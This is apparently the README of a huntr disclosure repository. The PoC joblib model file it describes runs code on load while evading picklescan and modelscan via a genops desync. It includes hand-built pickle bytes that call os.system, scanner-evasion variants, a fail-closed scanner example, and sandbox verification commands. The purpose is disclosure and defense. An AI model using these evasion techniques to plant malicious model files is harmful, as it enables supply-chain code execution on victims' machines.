⚠️ Security PoC — do NOT load outside a sandbox
This repository is a proof-of-concept for a huntr Model File Vulnerability (MFV) submission, not a real model.
evil_model.joblib is a crafted .joblib file demonstrating a scanner-evasion issue: it
achieves arbitrary code execution on joblib.load() while picklescan and modelscan both
report it as clean. The evasion is a pickletools.genops desync: joblib writes a NumPy
array's raw data bytes inline in the pickle stream, the scanners' opcode walk loses sync
on those bytes, and the payload that follows is never seen as opcodes (see the linked
huntr report for full detail).
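To make the failure mode concrete, here is an added example (editor-supplied, not code from this repository, picklescan or modelscan, and not the PoC's actual file layout): two toy scanners that walk hand-built pickle byte strings with pickletools.genops. A fail-open scanner treats a genops error as "nothing found"; a fail-closed one reports an incomplete walk as "unscannable" and additionally greps the raw bytes for GLOBAL-style `module\nname\n` signatures so that a desync that swallows the payload into a string argument still trips. The JUNK/SWALLOW/RAW_FLOATS streams are generic stand-ins for raw data sitting inline in an opcode stream (the real joblib layout is only in the huntr report); the function names, DANGEROUS_GLOBALS set and BYTE_SIGNATURES heuristic are this example's own assumptions. Every sample is only ever scanned, never unpickled.

```python
import pickle
import pickletools
import struct

# Assumption of this example: globals an untrusted model file must never resolve.
DANGEROUS_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "check_output"),
    ("builtins", "eval"), ("builtins", "exec"), ("builtins", "__import__"),
}
# Raw-byte spellings of those globals as the GLOBAL opcode encodes them
# ("module\nname\n").  This layer does not depend on genops staying in sync.
# (STACK_GLOBAL pushes module/name as separate strings and is not covered here.)
BYTE_SIGNATURES = [f"{m}\n{n}\n".encode() for m, n in DANGEROUS_GLOBALS]


def globals_in_stream(stream):
    """Walk the opcode stream with pickletools.genops and collect every
    (module, name) referenced by GLOBAL/INST or STACK_GLOBAL.  genops raises
    ValueError if it meets a byte that is not a valid opcode, or if the
    stream ends before STOP; that exception is deliberately not caught here."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(stream):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)      # genops returns "module name"
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)                   # candidate args for STACK_GLOBAL
    return found


def naive_scan(stream):
    """Hypothetical fail-open scanner: any genops error is reported as clean.
    This is the behaviour class the PoC relies on, not any specific tool's code."""
    try:
        hits = [g for g in globals_in_stream(stream) if g in DANGEROUS_GLOBALS]
    except ValueError:
        return "clean"
    return "infected" if hits else "clean"


def failclosed_scan(stream):
    """Fail-closed scanner: a walk that cannot complete is 'unscannable', and the
    byte signatures are checked independently of the opcode walk."""
    sig_hit = any(sig in stream for sig in BYTE_SIGNATURES)
    try:
        hits = [g for g in globals_in_stream(stream) if g in DANGEROUS_GLOBALS]
    except ValueError:
        return "infected" if sig_hit else "unscannable"
    return "infected" if (hits or sig_hit) else "clean"


# ---- constructed samples (hand-written opcodes; never passed to pickle.loads) ----
BENIGN = pickle.dumps({"coef": [0.5, -1.25], "n_features": 2}, protocol=4)

PAYLOAD_OPS = (
    b"cos\nsystem\n"   # GLOBAL os.system
    b"U\x02id"         # SHORT_BINSTRING "id"
    b"\x85"            # TUPLE1 -> ("id",)
    b"R"               # REDUCE -> os.system("id")
)
PLAIN_PAYLOAD = b"\x80\x02" + PAYLOAD_OPS + b"."

# Stand-in for inline raw data before the payload: 0xff is not a pickle opcode,
# so genops raises before it ever reaches the GLOBAL.
JUNK_DESYNC = b"\x80\x02" + b"\xff\xfe\xfd\xfc" + PAYLOAD_OPS + b"."

# Nastier stand-in: the inline bytes happen to start with 'T' (BINSTRING) and a
# length that swallows the whole payload as string data.  genops stays "in sync"
# and reports PROTO, BINSTRING, STOP with no GLOBAL at all.
SWALLOW_DESYNC = (b"\x80\x02" + b"T" + struct.pack("<I", len(PAYLOAD_OPS))
                  + PAYLOAD_OPS + b".")

# Genuinely harmless inline data (four little-endian doubles) that still breaks
# the walk: the honest answer is "unscannable", not "clean".
RAW_FLOATS = b"\x80\x02" + struct.pack("<4d", 0.1, 0.2, 0.3, 0.4) + b"]."


if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("plain_payload", PLAIN_PAYLOAD),
                        ("junk_desync", JUNK_DESYNC), ("swallow_desync", SWALLOW_DESYNC),
                        ("raw_floats", RAW_FLOATS)]:
        print(f"{label:15s} naive={naive_scan(blob):10s} failclosed={failclosed_scan(blob)}")
```

The byte-signature layer will also flag a benign pickle that happens to contain the literal text "os\nsystem\n" in a string; for a gate on untrusted model files that false positive is the right trade, since the alternative is the "clean" verdict the naive scanner gives on every desynced sample above.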
Payload is harmless
The embedded __reduce__ runs only this shell command:
id > /tmp/JOBLIB_PWNED; echo 'ACE via joblib.load' >> /tmp/JOBLIB_PWNED
i.e. it writes the output of id plus a marker line to /tmp/JOBLIB_PWNED. It touches no
other file, opens no network connection, and exfiltrates nothing. It exists solely to
prove code execution for triage.
Verify (in a disposable sandbox/container only)
sha256sum evil_model.joblib        # must match the digest below before you load anything
picklescan -p evil_model.joblib    # -> "Infected files: 0"
modelscan -p evil_model.joblib     # -> "No issues found! 🎉"
python3 -c 'import joblib; joblib.load("evil_model.joblib")'   # writes /tmp/JOBLIB_PWNED
cat /tmp/JOBLIB_PWNED              # output of id, then "ACE via joblib.load"
File integrity: sha256(evil_model.joblib) = dd6d22921e7b27b68d0522717ed2426bf0e17f3a0e3ad657df0e9d3674d30de4
This repo will be deleted after triage.